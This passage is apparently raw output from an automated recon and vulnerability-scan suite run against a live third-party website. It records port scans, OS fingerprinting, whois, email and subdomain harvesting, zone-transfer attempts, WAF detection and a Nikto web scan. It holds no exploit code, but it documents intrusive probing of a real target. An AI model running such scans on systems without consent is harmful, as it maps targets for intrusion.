  4009.  |  Changelog: https://www.nnhoney.com/wp-content/plugins/w3-total-cache/changelog.txt
  4010.  
  4011. [+] Finished: Thu Dec 21 16:25:15 2017
  4012. [+] Requests Done: 111
  4013. [+] Memory used: 164.477 MB
  4014. [+] Elapsed time: 00:01:16
  4015. [+] Honeypot Probabilty: 30%
  4016. ----------------------------------------
  4017. [+] Robots.txt retrieved
  4018. User-agent: *
  4019. Disallow: /wp-admin/
  4020. Allow: /wp-admin/admin-ajax.php
  4021.  
  4022. ----------------------------------------
  4023. PORT     STATE    SERVICE       VERSION
  4024. 21/tcp   filtered ftp
  4025. 22/tcp   filtered ssh
  4026. 23/tcp   filtered telnet
  4027. 25/tcp   filtered smtp
  4028. 80/tcp   open     http          Cloudflare nginx
  4029. 110/tcp  filtered pop3
  4030. 143/tcp  filtered imap
  4031. 443/tcp  open     ssl/https?
  4032. 445/tcp  filtered microsoft-ds
  4033. 3389/tcp filtered ms-wbt-server
  4034. ----------------------------------------
  4035.  
  4036. [+] DNS Records
  4037.  
  4038. [+] Host Records (A)
  4039. www.nnhoney.comHTTP: (104.18.37.196) AS13335 Cloudflare Inc
  4040.  
  4041. [+] TXT Records
  4042.  
  4043. [+] DNS Map: https://dnsdumpster.com/static/map/www.nnhoney.com.png
  4044.  
  4045. [>] Initiating 3 intel modules
  4046. [>] Loading Alpha module (1/3)
  4047. [>] Beta module deployed (2/3)
  4048. [>] Crawling the target for fuzzable URLs
  4049.  
  4050. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  4051. Server:     2001:568:ff09:10c::53
  4052. Address:    2001:568:ff09:10c::53#53
  4053.  
  4054. Non-authoritative answer:
  4055. Name:   nnhoney.com
  4056. Address: 104.18.37.196
  4057. Name:   nnhoney.com
  4058. Address: 104.18.36.196
  4059. Name:   nnhoney.com
  4060. Address: 2400:cb00:2048:1::6812:25c4
  4061. Name:   nnhoney.com
  4062. Address: 2400:cb00:2048:1::6812:24c4
  4063.  
  4064. nnhoney.com has address 104.18.37.196
  4065. nnhoney.com has address 104.18.36.196
  4066. nnhoney.com has IPv6 address 2400:cb00:2048:1::6812:24c4
  4067. nnhoney.com has IPv6 address 2400:cb00:2048:1::6812:25c4
  4068.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  4069.  
  4070. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  4071.  
  4072. [+] Target is nnhoney.com
  4073. [+] Loading modules.
  4074. [+] Following modules are loaded:
  4075. [x] [1] ping:icmp_ping  -  ICMP echo discovery module
  4076. [x] [2] ping:tcp_ping  -  TCP-based ping discovery module
  4077. [x] [3] ping:udp_ping  -  UDP-based ping discovery module
  4078. [x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
  4079. [x] [5] infogather:portscan  -  TCP and UDP PortScanner
  4080. [x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
  4081. [x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
  4082. [x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
  4083. [x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
  4084. [x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
  4085. [x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
  4086. [x] [12] fingerprint:smb  -  SMB fingerprinting module
  4087. [x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
  4088. [+] 13 modules registered
  4089. [+] Initializing scan engine
  4090. [+] Running scan engine
  4091. [-] ping:tcp_ping module: no closed/open TCP ports known on 104.18.36.196. Module test failed
  4092. [-] ping:udp_ping module: no closed/open UDP ports known on 104.18.36.196. Module test failed
  4093. [-] No distance calculation. 104.18.36.196 appears to be dead or no ports known
  4094. [+] Host: 104.18.36.196 is up (Guess probability: 50%)
  4095. [+] Target: 104.18.36.196 is alive. Round-Trip Time: 0.49973 sec
  4096. [+] Selected safe Round-Trip Time value is: 0.99946 sec
  4097. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  4098. [-] fingerprint:smb need either TCP port 139 or 445 to run
  4099. [+] Primary guess:
  4100. [+] Host 104.18.36.196 Running OS:  (Guess probability: 100%)
  4101. [+] Other guesses:
  4102. [+] Host 104.18.36.196 Running OS: PãIìÌU (Guess probability: 91%)
  4103. [+] Host 104.18.36.196 Running OS: ŸJìÌU (Guess probability: 91%)
  4104. [+] Host 104.18.36.196 Running OS:  (Guess probability: 91%)
  4105. [+] Host 104.18.36.196 Running OS: PãIìÌU (Guess probability: 91%)
  4106. [+] Host 104.18.36.196 Running OS: PãIìÌU (Guess probability: 91%)
  4107. [+] Host 104.18.36.196 Running OS: PãIìÌU (Guess probability: 91%)
  4108. [+] Host 104.18.36.196 Running OS: PãIìÌU (Guess probability: 91%)
  4109. [+] Host 104.18.36.196 Running OS: ŸJìÌU (Guess probability: 91%)
  4110. [+] Host 104.18.36.196 Running OS: ŸJìÌU (Guess probability: 91%)
  4111. [+] Cleaning up scan engine
  4112. [+] Modules deinitialized
  4113. [+] Execution completed.
  4114.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  4115.    Domain Name: NNHONEY.COM
  4116.    Registry Domain ID: 144391280_DOMAIN_COM-VRSN
  4117.    Registrar WHOIS Server: whois.enom.com
  4118.    Registrar URL: http://www.enom.com
  4119.    Updated Date: 2017-11-27T21:01:56Z
  4120.    Creation Date: 2005-02-28T15:40:53Z
  4121.    Registry Expiry Date: 2018-02-28T15:40:53Z
  4122.    Registrar: eNom, Inc.
  4123.    Registrar IANA ID: 48
  4124.    Registrar Abuse Contact Email:
  4125.    Registrar Abuse Contact Phone:
  4126.    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  4127.    Name Server: IAN.NS.CLOUDFLARE.COM
  4128.    Name Server: POLA.NS.CLOUDFLARE.COM
  4129.    DNSSEC: unsigned
  4130.    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  4131. >>> Last update of whois database: 2017-12-22T16:32:26Z <<<
  4132.  
  4133. For more information on Whois status codes, please visit https://icann.org/epp
  4134.  
  4135. NOTICE: The expiration date displayed in this record is the date the
  4136. registrar's sponsorship of the domain name registration in the registry is
  4137. currently set to expire. This date does not necessarily reflect the expiration
  4138. date of the domain name registrant's agreement with the sponsoring
  4139. registrar.  Users may consult the sponsoring registrar's Whois database to
  4140. view the registrar's reported date of expiration for this registration.
  4141.  
  4142. TERMS OF USE: You are not authorized to access or query our Whois
  4143. database through the use of electronic processes that are high-volume and
  4144. automated except as reasonably necessary to register domain names or
  4145. modify existing registrations; the Data in VeriSign Global Registry
  4146. Services' ("VeriSign") Whois database is provided by VeriSign for
  4147. information purposes only, and to assist persons in obtaining information
  4148. about or related to a domain name registration record. VeriSign does not
  4149. guarantee its accuracy. By submitting a Whois query, you agree to abide
  4150. by the following terms of use: You agree that you may use this Data only
  4151. for lawful purposes and that under no circumstances will you use this Data
  4152. to: (1) allow, enable, or otherwise support the transmission of mass
  4153. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  4154. or facsimile; or (2) enable high volume, automated, electronic processes
  4155. that apply to VeriSign (or its computer systems). The compilation,
  4156. repackaging, dissemination or other use of this Data is expressly
  4157. prohibited without the prior written consent of VeriSign. You agree not to
  4158. use electronic processes that are automated and high-volume to access or
  4159. query the Whois database except as reasonably necessary to register
  4160. domain names or modify existing registrations. VeriSign reserves the right
  4161. to restrict your access to the Whois database in its sole discretion to ensure
  4162. operational stability.  VeriSign may restrict or terminate your access to the
  4163. Whois database for failure to abide by these terms of use. VeriSign
  4164. reserves the right to modify these terms at any time.
  4165.  
  4166. The Registry database contains ONLY .COM, .NET, .EDU domains and
  4167. Registrars.
  4168.  
  4169.  
  4170. Domain Name: NNHONEY.COM
  4171. Registry Domain ID: 144391280_DOMAIN_COM-VRSN
  4172. Registrar WHOIS Server: whois.enom.com
  4173. Registrar URL: www.enom.com
  4174. Updated Date: 2014-01-28T00:38:53.00Z
  4175. Creation Date: 2005-02-28T15:40:00.00Z
  4176. Registrar Registration Expiration Date: 2018-02-28T15:40:53.00Z
  4177. Registrar: ENOM, INC.
  4178. Registrar IANA ID: 48
  4179. Reseller: NAMECHEAP.COM
  4180. Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
  4181. Registry Registrant ID:
  4182. Registrant Name: WHOISGUARD PROTECTED
  4183. Registrant Organization: WHOISGUARD, INC.
  4184. Registrant Street: P.O. BOX 0823-03411
  4185. Registrant City: PANAMA
  4186. Registrant State/Province: PANAMA
  4187. Registrant Postal Code:
  4188. Registrant Country: PA
  4189. Registrant Phone: +507.8365503
  4190. Registrant Phone Ext:
  4191. Registrant Fax: +51.17057182
  4192. Registrant Fax Ext:
  4193. Registrant Email: 8744BA8A894748FC9BEC2D501C931A60.PROTECT@WHOISGUARD.COM
  4194. Registry Admin ID:
  4195. Admin Name: WHOISGUARD PROTECTED
  4196. Admin Organization: WHOISGUARD, INC.
  4197. Admin Street: P.O. BOX 0823-03411
  4198. Admin City: PANAMA
  4199. Admin State/Province: PANAMA
  4200. Admin Postal Code:
  4201. Admin Country: PA
  4202. Admin Phone: +507.8365503
  4203. Admin Phone Ext:
  4204. Admin Fax: +51.17057182
  4205. Admin Fax Ext:
  4206. Admin Email: 8744BA8A894748FC9BEC2D501C931A60.PROTECT@WHOISGUARD.COM
  4207. Registry Tech ID:
  4208. Tech Name: WHOISGUARD PROTECTED
  4209. Tech Organization: WHOISGUARD, INC.
  4210. Tech Street: P.O. BOX 0823-03411
  4211. Tech City: PANAMA
  4212. Tech State/Province: PANAMA
  4213. Tech Postal Code:
  4214. Tech Country: PA
  4215. Tech Phone: +507.8365503
  4216. Tech Phone Ext:
  4217. Tech Fax: +51.17057182
  4218. Tech Fax Ext:
  4219. Tech Email: 8744BA8A894748FC9BEC2D501C931A60.PROTECT@WHOISGUARD.COM
  4220. Name Server: IAN.NS.CLOUDFLARE.COM
  4221. Name Server: POLA.NS.CLOUDFLARE.COM
  4222. DNSSEC: unSigned
  4223. Registrar Abuse Contact Email: abuse@enom.com
  4224. Registrar Abuse Contact Phone: +1.4252982646
  4225. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  4226. >>> Last update of WHOIS database: 2014-01-28T00:38:53.00Z <<<
  4227.  
  4228. For more information on Whois status codes, please visit https://icann.org/epp
  4229.  
  4230.  
  4231. The data in this whois database is provided to you for information
  4232. purposes only, that is, to assist you in obtaining information about or
  4233. related to a domain name registration record. We make this information
  4234. available "as is," and do not guarantee its accuracy. By submitting a
  4235. whois query, you agree that you will use this data only for lawful
  4236. purposes and that, under no circumstances will you use this data to: (1)
  4237. enable high volume, automated, electronic processes that stress or load
  4238. this whois database system providing you this information; or (2) allow,
  4239. enable, or otherwise support the transmission of mass unsolicited,
  4240. commercial advertising or solicitations via direct mail, electronic
  4241. mail, or by telephone. The compilation, repackaging, dissemination or
  4242. other use of this data is expressly prohibited without prior written
  4243. consent from us.  
  4244.  
  4245. We reserve the right to modify these terms at any time. By submitting
  4246. this query, you agree to abide by these terms.
  4247. Version 6.3 4/3/2002
  4248.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  4249.  
  4250. *******************************************************************
  4251. *                                                                 *
  4252. * | |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __  *
  4253. * | __| '_ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  4254. * | |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |    *
  4255. *  \__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|    *
  4256. *                                                                 *
  4257. * TheHarvester Ver. 2.7                                           *
  4258. * Coded by Christian Martorella                                   *
  4259. * Edge-Security Research                                          *
  4260. * cmartorella@edge-security.com                                   *
  4261. *******************************************************************
  4262.  
  4263.  
  4264. Full harvest..
  4265. [-] Searching in Google..
  4266.     Searching 0 results...
  4267.     Searching 100 results...
  4268.     Searching 200 results...
  4269. [-] Searching in PGP Key server..
  4270. [-] Searching in Bing..
  4271.     Searching 50 results...
  4272.     Searching 100 results...
  4273.     Searching 150 results...
  4274.     Searching 200 results...
  4275. [-] Searching in Exalead..
  4276.     Searching 50 results...
  4277.     Searching 100 results...
  4278.     Searching 150 results...
  4279.     Searching 200 results...
  4280.     Searching 250 results...
  4281.  
  4282.  
  4283. [+] Emails found:
  4284. ------------------
  4285. 2A@nnhoney.com
  4286.  
  4287. [+] Hosts found in search engines:
  4288. ------------------------------------
  4289. [-] Resolving hostnames IPs...
  4290. 104.18.36.196:www.nnhoney.com
  4291. [+] Virtual hosts:
  4292. ==================
  4293. 104.18.36.196   www.farmac
  4294. 104.18.36.196   hora1.com.br
  4295. 104.18.36.196   www.nnhoney
  4296. 104.18.36.196   www.nnhoney.com
  4297. 104.18.36.196   www.docu.sk
  4298.  
  4299. ******************************************************
  4300. *     /\/\   ___| |_ __ _  __ _  ___   ___  / _(_) | *
  4301. *    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  4302. *   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *
  4303. *   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  4304. *                         |___/                      *
  4305. * Metagoofil Ver 2.2                                 *
  4306. * Christian Martorella                               *
  4307. * Edge-Security.com                                  *
  4308. * cmartorella_at_edge-security.com                   *
  4309. ****************************************************** 
  4310.  
  4311. [-] Starting online search...
  4312.  
  4313. [-] Searching for doc files, with a limit of 200
  4314.     Searching 100 results...
  4315.     Searching 200 results...
  4316. Results: 0 files found
  4317. Starting to download 50 of them:
  4318. ----------------------------------------
  4319.  
  4320.  
  4321. [-] Searching for pdf files, with a limit of 200
  4322.     Searching 100 results...
  4323.     Searching 200 results...
  4324. Results: 0 files found
  4325. Starting to download 50 of them:
  4326. ----------------------------------------
  4327.  
  4328.  
  4329. [-] Searching for xls files, with a limit of 200
  4330.     Searching 100 results...
  4331.     Searching 200 results...
  4332. Results: 0 files found
  4333. Starting to download 50 of them:
  4334. ----------------------------------------
  4335.  
  4336.  
  4337. [-] Searching for csv files, with a limit of 200
  4338.     Searching 100 results...
  4339.     Searching 200 results...
  4340. Results: 0 files found
  4341. Starting to download 50 of them:
  4342. ----------------------------------------
  4343.  
  4344.  
  4345. [-] Searching for txt files, with a limit of 200
  4346.     Searching 100 results...
  4347.     Searching 200 results...
  4348. Results: 0 files found
  4349. Starting to download 50 of them:
  4350. ----------------------------------------
  4351.  
  4352. processing
  4353. user
  4354. email
  4355.  
  4356. [+] List of users found:
  4357. --------------------------
  4358.  
  4359. [+] List of software found:
  4360. -----------------------------
  4361.  
  4362. [+] List of paths and servers found:
  4363. ---------------------------------------
  4364.  
  4365. [+] List of e-mails found:
  4366. ----------------------------
  4367.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  4368.  
  4369. ; <<>> DiG 9.11.2-5-Debian <<>> -x nnhoney.com
  4370. ;; global options: +cmd
  4371. ;; Got answer:
  4372. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 48319
  4373. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  4374.  
  4375. ;; OPT PSEUDOSECTION:
  4376. ; EDNS: version: 0, flags:; udp: 4096
  4377. ;; QUESTION SECTION:
  4378. ;com.nnhoney.in-addr.arpa.  IN  PTR
  4379.  
  4380. ;; AUTHORITY SECTION:
  4381. in-addr.arpa.       3600    IN  SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102485 1800 900 604800 3600
  4382.  
  4383. ;; Query time: 585 msec
  4384. ;; SERVER: 2001:568:ff09:10c::53#53(2001:568:ff09:10c::53)
  4385. ;; WHEN: Fri Dec 22 11:39:01 EST 2017
  4386. ;; MSG SIZE  rcvd: 121
  4387.  
  4388. dnsenum VERSION:1.2.4
  4389. 
  4390. -----   nnhoney.com   -----
  4391. 
  4392.  
  4393. Host's addresses:
  4394. __________________
  4395.  
  4396. nnhoney.com.                             300      IN    A        104.18.36.196
  4397. nnhoney.com.                             300      IN    A        104.18.37.196
  4398. 
  4399.  
  4400. Name Servers:
  4401. ______________
  4402.  
  4403. ian.ns.cloudflare.com.                   19401    IN    A        173.245.59.118
  4404. pola.ns.cloudflare.com.                  30290    IN    A        173.245.58.214
  4405. 
  4406.  
  4407. Mail (MX) Servers:
  4408. ___________________
  4409.  
  4410. 
  4411.  
  4412. Trying Zone Transfers and getting Bind Versions:
  4413. _________________________________________________
  4414.  
  4415. 
  4416. Trying Zone Transfer for nnhoney.com on ian.ns.cloudflare.com ...
  4417.  
  4418. Trying Zone Transfer for nnhoney.com on pola.ns.cloudflare.com ...
  4419.  
  4420. brute force file not specified, bay.
  4421.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  4422. 
  4423.                  ____        _     _ _     _   _____
  4424.                 / ___| _   _| |__ | (_)___| |_|___ / _ __
  4425.                 \___ \| | | | '_ \| | / __| __| |_ \| '__|
  4426.                  ___) | |_| | |_) | | \__ \ |_ ___) | |
  4427.                 |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  4428.  
  4429.                 # Coded By Ahmed Aboul-Ela - @aboul3la
  4430.    
  4431. [-] Enumerating subdomains now for nnhoney.com
  4432. [-] verbosity is enabled, will show the subdomains results in realtime
  4433. [-] Searching now in Baidu..
  4434. [-] Searching now in Yahoo..
  4435. [-] Searching now in Google..
  4436. [-] Searching now in Bing..
  4437. [-] Searching now in Ask..
  4438. [-] Searching now in Netcraft..
  4439. [-] Searching now in DNSdumpster..
  4440. [-] Searching now in Virustotal..
  4441. [-] Searching now in ThreatCrowd..
  4442. [-] Searching now in SSL Certificates..
  4443. [-] Searching now in PassiveDNS..
  4444. Yahoo: www.nnhoney.com
  4445. Virustotal: www.nnhoney.com
  4446. Bing: www.nnhoney.com
  4447. Netcraft: www.nnhoney.com
  4448. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-nnhoney.com.txt
  4449. [-] Total Unique Subdomains Found: 1
  4450. www.nnhoney.com
  4451.  
  4452.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
  4453.  ║  â• â•Šâ• ║ ╚═╗╠═╣
  4454.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  4455.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  4456. 
  4457. *.nnhoney.com
  4458.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-nnhoney.com-full.txt
  4459. 
  4460.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  4461.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  4462.  
  4463.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  4464. PING nnhoney.com(2400:cb00:2048:1::6812:25c4 (2400:cb00:2048:1::6812:25c4)) 56 data bytes
  4465. 64 bytes from 2400:cb00:2048:1::6812:25c4 (2400:cb00:2048:1::6812:25c4): icmp_seq=1 ttl=60 time=29.2 ms
  4466.  
  4467. --- nnhoney.com ping statistics ---
  4468. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  4469. rtt min/avg/max/mdev = 29.202/29.202/29.202/0.000 ms
  4470.  
  4471.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  4472.  
  4473. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-22 11:40 EST
  4474. Nmap scan report for nnhoney.com (104.18.37.196)
  4475. Host is up (0.14s latency).
  4476. Other addresses for nnhoney.com (not scanned): 2400:cb00:2048:1::6812:24c4 2400:cb00:2048:1::6812:25c4 104.18.36.196
  4477. Not shown: 468 filtered ports
  4478. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  4479. PORT     STATE SERVICE
  4480. 80/tcp   open  http
  4481. 443/tcp  open  https
  4482. 8080/tcp open  http-proxy
  4483. 8443/tcp open  https-alt
  4484. 8880/tcp open  cddbp-alt
  4485.  
  4486. Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
  4487.  
  4488.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  4489.  + -- --=[Port 21 closed... skipping.
  4490.  + -- --=[Port 22 closed... skipping.
  4491.  + -- --=[Port 23 closed... skipping.
  4492.  + -- --=[Port 25 closed... skipping.
  4493.  + -- --=[Port 53 closed... skipping.
  4494.  + -- --=[Port 79 closed... skipping.
  4495.  + -- --=[Port 80 opened... running tests...
  4496.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  4497.  
  4498.                                  ^     ^
  4499.         _   __  _   ____ _   __  _    _   ____
  4500.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  4501.       | V V // o // _/ | V V // 0 // 0 // _/
  4502.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  4503.                                 <
  4504.                                  ...'
  4505.  
  4506.     WAFW00F - Web Application Firewall Detection Tool
  4507.  
  4508.     By Sandro Gauci && Wendel G. Henrique
  4509.  
  4510. Checking http://nnhoney.com
  4511. The site http://nnhoney.com is behind a CloudFlare
  4512. Number of requests: 1
  4513.  
  4514.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  4515. http://nnhoney.com [301 Moved Permanently] CloudFlare, Cookies[__cfduid,wfvt_722878283], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid,wfvt_722878283], IP[104.18.36.196], PHP[5.6.32], RedirectLocation[https://nnhoney.com/], UncommonHeaders[cf-ray], X-Powered-By[PHP/5.6.32]
  4516. https://nnhoney.com/ [301 Moved Permanently] CloudFlare, Cookies[__cfduid,wfvt_1470590672], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid,wfvt_1470590672], IP[104.18.36.196], PHP[5.6.32], RedirectLocation[https://www.nnhoney.com/], UncommonHeaders[cf-ray], X-Powered-By[PHP/5.6.32]
  4517. https://www.nnhoney.com/ [200 OK] CloudFlare, Cookies[__cfduid,wfvt_1470590672], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid,wfvt_1470590672], IP[104.18.36.196], JQuery[1.12.4], MetaGenerator[WordPress 4.9.1], Open-Graph-Protocol[website], PHP[5.6.32], Script[application/ld+json,text/javascript], Title[NN Honey - NN Teens Are The Best Teens], UncommonHeaders[link,cf-ray], WordPress[4.9.1], X-Powered-By[PHP/5.6.32]
  4518.  
  4519.    __  ______ _____ 
  4520.    \ \/ / ___|_   _|
  4521.     \  /\___ \ | |  
  4522.     /  \ ___) || |  
  4523.    /_/\_|____/ |_|  
  4524.  
  4525. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  4526. + -- --=[Target: nnhoney.com:80
  4527. + -- --=[Site not vulnerable to Cross-Site Tracing!
  4528. + -- --=[Site not vulnerable to Host Header Injection!
  4529.  
  4530.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  4531. + -- --=[Checking if X-Content options are enabled on nnhoney.com... 
  4532.  
  4533. + -- --=[Checking if X-Frame options are enabled on nnhoney.com... 
  4534.  
  4535. + -- --=[Checking if X-XSS-Protection header is enabled on nnhoney.com... 
  4536.  
  4537. + -- --=[Checking HTTP methods on nnhoney.com... 
  4538.  
  4539. + -- --=[Checking if TRACE method is enabled on nnhoney.com... 
  4540.  
  4541. + -- --=[Checking for META tags on nnhoney.com... 
  4542.  
  4543. + -- --=[Checking for open proxy on nnhoney.com... 
  4544.   </div><!-- /#cf-wrapper -->
  4545.  
  4546.   <script type="text/javascript">
  4547.   window._cf_translation = {};
  4548.  
  4549.  
  4550. </script>
  4551.  
  4552. </body>
  4553. </html>
  4554.  
  4555. + -- --=[Enumerating software on nnhoney.com... 
  4556. X-Powered-By: PHP/5.6.32
  4557. Server: cloudflare
  4558.  
  4559. + -- --=[Checking if Strict-Transport-Security is enabled on nnhoney.com... 
  4560.  
  4561. + -- --=[Checking for Flash cross-domain policy on nnhoney.com... 
  4562.  
  4563. + -- --=[Checking for Silverlight cross-domain policy on nnhoney.com... 
  4564.  
  4565. + -- --=[Checking for HTML5 cross-origin resource sharing on nnhoney.com... 
  4566.  
  4567. + -- --=[Retrieving robots.txt on nnhoney.com... 
  4568.  
  4569. + -- --=[Retrieving sitemap.xml on nnhoney.com... 
  4570.  
  4571. + -- --=[Checking cookie attributes on nnhoney.com... 
  4572. Set-Cookie: __cfduid=d9ef08a058a0e07365f3bcab2d5f04b031513961103; expires=Sat, 22-Dec-18 16:45:03 GMT; path=/; domain=.nnhoney.com; HttpOnly
  4573. Set-Cookie: wfvt_722878283=5a3d3691ee39e; expires=Fri, 22-Dec-2017 17:15:05 GMT; Max-Age=1800; path=/; httponly
  4574.  
  4575. + -- --=[Checking for ASP.NET Detailed Errors on nnhoney.com... 
  4576.  
  4577. 
  4578.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  4579. - Nikto v2.1.6
  4580. ---------------------------------------------------------------------------
  4581. + Target IP:          104.18.37.196
  4582. + Target Hostname:    nnhoney.com
  4583. + Target Port:        80
  4584. + Start Time:         2017-12-22 11:45:59 (GMT-5)
  4585. ---------------------------------------------------------------------------
  4586. + Server: cloudflare
  4587. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  4588. + Uncommon header 'cf-ray' found, with contents: 3d148dfe948d149d-AMS
  4589. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  4590. + All CGI directories 'found', use '-C none' to test none
  4591. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  4592. + 26097 requests: 0 error(s) and 3 item(s) reported on remote host
  4593. + End Time:           2017-12-22 13:39:50 (GMT-5) (6831 seconds)
  4594. ---------------------------------------------------------------------------
  4595. + 1 host(s) tested
  4596.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  4597. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/nnhoney.com-port80.jpg
  4598.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  4599.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  4600.  
  4601.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  4602.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  4603.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  4604.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  4605.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  4606.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  4607.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  4608.  
  4609. __[ ! ] Neither war between hackers, nor peace for the system.
  4610. __[ ! ] http://blog.inurl.com.br
  4611. __[ ! ] http://fb.com/InurlBrasil
  4612. __[ ! ] http://twitter.com/@googleinurl
  4613. __[ ! ] http://github.com/googleinurl
  4614. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  4615. __[ ! ] Current script owner::[ root ]
  4616. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  4617. __[ ! ] Current pwd::[ /usr/share/sniper ]
  4618. __[ ! ] Help: php inurlbr.php --help
  4619. ------------------------------------------------------------------------------------------------------------------------
  4620.  
  4621. [ ! ] Starting SCANNER INURLBR 2.1 at [22-12-2017 13:41:09]
  4622. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  4623. It is the end user's responsibility to obey all applicable local, state and federal laws.
  4624. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  4625.  
  4626. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nnhoney.com.txt  ]
  4627. [ INFO ][ DORK ]::[ site:nnhoney.com ]
  4628. [ INFO ][ SEARCHING ]:: {
  4629. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.lk ]
  4630.  
  4631. [ INFO ][ SEARCHING ]:: 
  4632. -[:::]
  4633. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  4634.  
  4635. [ INFO ][ SEARCHING ]:: 
  4636. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4637. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.nu ID: 012984904789461885316:oy3-mu17hxk ]
  4638.  
  4639. [ INFO ][ SEARCHING ]:: 
  4640. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  4641.  
  4642. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  4643. [ INFO ] Not a satisfactory result was found!
  4644.  
  4645.  
  4646. [ INFO ] [ Shutting down ]
  4647. [ INFO ] [ End of process INURLBR at [22-12-2017 13:42:59]
  4648. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  4649. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-nnhoney.com.txt  ]
  4650. |_________________________________________________________________________________________
  4651.  
  4652. \_________________________________________________________________________________________/
  4653.  
  4654.  + -- --=[Port 110 closed... skipping.
  4655.  + -- --=[Port 111 closed... skipping.
  4656.  + -- --=[Port 135 closed... skipping.
  4657.  + -- --=[Port 139 closed... skipping.
